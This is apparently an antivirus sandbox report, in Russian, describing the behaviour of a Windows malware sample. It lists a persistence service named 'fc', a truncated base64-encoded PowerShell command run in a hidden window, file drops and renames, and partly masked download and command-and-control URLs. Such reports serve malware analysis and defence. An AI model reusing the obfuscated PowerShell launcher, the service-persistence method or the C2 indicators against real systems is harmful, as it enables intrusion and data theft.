Техническая информация
Для обеспечения автозапуска и распространения
Устанавливает следующие настройки сервисов
- [<HKLM>\System\CurrentControlSet\Services\fc] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\fc] 'ImagePath' = '"%WINDIR%\SysWOW64\netsh\fc.exe"'
Создает следующие сервисы
- 'fc' "%WINDIR%\SysWOW64\netsh\fc.exe"
- 'fc' %WINDIR%\SysWOW64\netsh\fc.exe
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAHMAZQB0AC0AdgBBAFIASQBBAEIAbABFACAAIAAoACcAMQBJACcAKwAnADYAdwBlAEwAJwApACAAKAAgAFsAVABZAFAARQBdACgAJwBzACcAKwAnAHkAJwArACcAUwB0AGUAbQAnACsAJwAuAEkAbwAnACsAJwAuAEQAaQ...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\s4uz2ti\mdmo8iu\z9nwl10.exe
Удаляет следующие файлы
- %WINDIR%\syswow64\netsh\fc.exe
Перемещает следующие файлы
- %HOMEPATH%\s4uz2ti\mdmo8iu\z9nwl10.exe в %WINDIR%\syswow64\netsh\fc.exe
Сетевая активность
Подключается к
- '19#.#45.25.228':80
- '98.##3.204.12':443
TCP
Запросы HTTP GET
- http://wo##uit.com/ram-aisin/7r9/
- http://ho##iq.com/cgi-bin/Xyv/
- http://bo#####roadesivos.com/gallery_03f59a1cc20096539c7aec1b61d7471a/3e/
Запросы HTTP POST
- http://98.###.204.12:443/Pn8pP2otk/092HbJHFjB/KwMrV/NeX23nJJOcMGWaY/ via 98.##3.204.12
UDP
- DNS ASK wo##uit.com
- DNS ASK ho##iq.com
- DNS ASK bo#####roadesivos.com
Другое
Создает и запускает на исполнение
- '%HOMEPATH%\s4uz2ti\mdmo8iu\z9nwl10.exe'
- '%WINDIR%\syswow64\netsh\fc.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAHMAZQB0AC0AdgBBAFIASQBBAEIAbABFACAAIAAoACcAMQBJACcAKwAnADYAdwBlAEwAJwApACAAKAAgAFsAVABZAFAARQBdACgAJwBzACcAKwAnAHkAJwArACcAUwB0AGUAbQAnACsAJwAuAEkAbwAnACsAJwAuAEQAaQ...' (со скрытым окном)
